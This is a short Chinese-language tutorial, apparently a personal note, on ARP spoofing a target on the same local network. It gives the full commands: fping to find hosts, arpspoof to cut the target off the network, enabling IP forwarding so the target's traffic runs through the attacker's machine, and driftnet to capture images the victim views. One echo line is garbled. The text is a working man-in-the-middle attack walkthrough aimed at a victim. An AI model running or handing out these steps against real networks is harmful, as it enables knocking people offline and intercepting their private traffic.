条件:假设已知一个ip,你与他在一个局域网
arp是根据IP地址获取物理地址的一个TCP/IP协议
攻击方式:arp攻击
使用工具:arpsoof
arpspoof -i 网卡 -t 目标 IP 网关
需要:
使用自己自身的网卡 例如:eth0
目标ip 假设目标为192.168.1.100
受害网关 默认网关默认为主网关,这里为192.168.1.1
如何查看局域网中的IP?
Fping -asg 192.168.1.0/24 (填自己所在的网段)
使用工具/技术:
Arpspoof -i 网卡 -t 目标 网关
此语句是Arp断网,能使IP流量经过我的网卡(传不出去)
Arp欺骗,是使目标的IP流量经过我的网卡,然后从网关出去。
/分割线/
流程:
1.使目标IP经过我网卡
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
此时对象被断网
2.使目标从网关出去,进行流量转发
echo 1 >/proc/sys
echo 1 >/proc/sys/net/ipv4/ip_forward(进行流量转发)
(echo命令无回显)
主机ping 8.8.8.8
连接成功,无断网现象
driftnet ——》获取本机网卡的图片(在arp欺骗成功的条件下)
driftnet -i eth0
因为它的流量要经过我的网卡,所以很容易得到他的内容
也可以用抓包工具来抓取流经网卡的数据
此时 目的流量——》我的网卡——》网关
只要目标查看网页含有图片内容,那么你就能获取到
获取到的信息保存在 /tmp/drifnet-XXXXXXXXX中